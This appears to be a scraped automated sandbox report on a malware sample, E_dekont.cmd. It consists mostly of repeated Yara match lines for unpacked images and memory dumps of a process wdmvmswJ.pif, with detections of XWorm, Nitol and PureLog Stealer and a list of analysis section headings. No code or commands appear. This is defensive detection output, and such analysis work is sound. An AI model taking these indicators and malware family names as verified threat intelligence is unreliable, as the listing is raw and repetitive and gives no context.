Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e720000.1151.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.268b0f08.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e760000.1094.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.922.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e750000.1112.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd46478.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.213f0000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e610000.1102.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e780000.1055.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd45570.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e720000.1149.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e750000.1111.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.904.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.279e5570.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e610000.1103.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.915.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.27a02b90.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.3.wdmvmswJ.pif.244ea0a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e770000.1053.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.265becae.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e760000.1115.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e730000.1154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.941.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.927.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1eb40000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1066.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1064.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e780000.1058.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1eb40000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.914.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e760000.1093.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.848.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.1060.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.919.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6d0000.1068.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.wdmvmswJ.pif.1c684410.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.865.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.1160.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.845.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1e8fecae.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.29240000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1062.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.846.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.268b0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1067.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e760000.1092.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.1161.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e730000.1155.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.853.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.849.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e620000.1099.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.925.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.279e6478.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.29240000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.921.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e730000.1152.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd62b90.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e620000.1100.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1061.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.851.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e720000.1148.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.27a02b90.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e620000.1097.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.1162.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.928.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6b0000.1095.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.918.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.942.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e720000.1150.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.3.wdmvmswJ.pif.244ea0a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.917.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e5f0000.1165.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.wdmvmswJ.pif.1c684410.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e620000.1101.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e770000.1054.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6c0000.1163.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e780000.1056.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1e8ffbb6.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.913.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e750000.1110.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.268b0f08.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e620000.1098.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e730000.1153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e760000.1002.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.924.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e780000.1057.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.265becae.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.1159.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1eb40f08.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.265bfbb6.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1065.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e610000.1096.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.265bfbb6.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd62b90.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd45570.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.843.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.923.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.929.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e770000.1052.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6c0000.1164.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd46478.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.268b0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1e8ffbb6.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.850.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.903.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.279e6478.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e8e0cd8.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.847.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.920.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1063.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.279e5570.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.916.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.1158.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.844.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e8e0cd8.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.866.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.1059.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e770000.1051.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000002.1848536058.000000001FD45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1848938336.00000000213F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1798010411.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1840076965.000000001E8BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1553023677.000000001E8E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1795060712.00000000279E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1840971745.000000001EB40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1782173123.00000000268B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.1766990632.000000001C684000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected XWorm

Source: Yara match	File source: 00000026.00000002.1842028459.000000001EDB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1782690545.0000000026A57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wdmvmswJ.pif PID: 2056, type: MEMORYSTR

Remote Access Functionality

Yara detected Nitol

Source: Yara match

File source: Process Memory Space: wdmvmswJ.pif PID: 2056, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 38.2.wdmvmswJ.pif.1e8fecae.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.213f0000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.852.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1eb40f08.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e720000.1151.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.268b0f08.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e760000.1094.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.922.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e750000.1112.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd46478.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.213f0000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e610000.1102.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e780000.1055.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd45570.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e720000.1149.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e750000.1111.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.904.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.279e5570.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e610000.1103.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.915.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.27a02b90.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.3.wdmvmswJ.pif.244ea0a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e770000.1053.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.265becae.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e760000.1115.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e730000.1154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.941.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.927.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1eb40000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1066.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1064.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e780000.1058.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1eb40000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.914.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e760000.1093.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.848.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.1060.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.919.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6d0000.1068.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.wdmvmswJ.pif.1c684410.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.865.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.1160.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.845.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1e8fecae.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.29240000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1062.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.846.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.268b0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1067.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e760000.1092.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.1161.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e730000.1155.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.853.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.849.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e620000.1099.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.925.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.279e6478.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.29240000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.921.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e730000.1152.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd62b90.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e620000.1100.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1061.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.851.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e720000.1148.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.27a02b90.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e620000.1097.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.1162.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.928.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6b0000.1095.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.918.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.942.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e720000.1150.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.3.wdmvmswJ.pif.244ea0a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.917.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e5f0000.1165.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.wdmvmswJ.pif.1c684410.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e620000.1101.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e770000.1054.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6c0000.1163.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e780000.1056.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1e8ffbb6.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.913.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e750000.1110.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.268b0f08.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e620000.1098.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e730000.1153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e760000.1002.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.924.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e780000.1057.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.265becae.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.1159.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1eb40f08.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.265bfbb6.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1065.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e610000.1096.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.265bfbb6.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd62b90.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd45570.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.843.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e710000.923.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.929.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e770000.1052.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6c0000.1164.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1fd46478.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.268b0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1e8ffbb6.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.850.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.903.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.279e6478.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e8e0cd8.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.847.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.920.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e790000.1063.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wdmvmswJ.pif.279e5570.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.916.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e740000.1158.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e6f0000.844.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e8e0cd8.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.866.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e7a0000.1059.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e770000.1051.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000002.1848536058.000000001FD45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1848938336.00000000213F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1798010411.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1840076965.000000001E8BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1553023677.000000001E8E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1795060712.00000000279E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1840971745.000000001EB40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1782173123.00000000268B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.1766990632.000000001C684000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected XWorm

Source: Yara match	File source: 00000026.00000002.1842028459.000000001EDB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.1782690545.0000000026A57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wdmvmswJ.pif PID: 2056, type: MEMORYSTR

Windows Analysis Report
E_dekont.cmd

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1546600
Product:	CloudBasic
Start time:	08:22:10
Start date:	01.11.2024
Sample:	E_dekont.cmd
Cookbook:	default.jbs
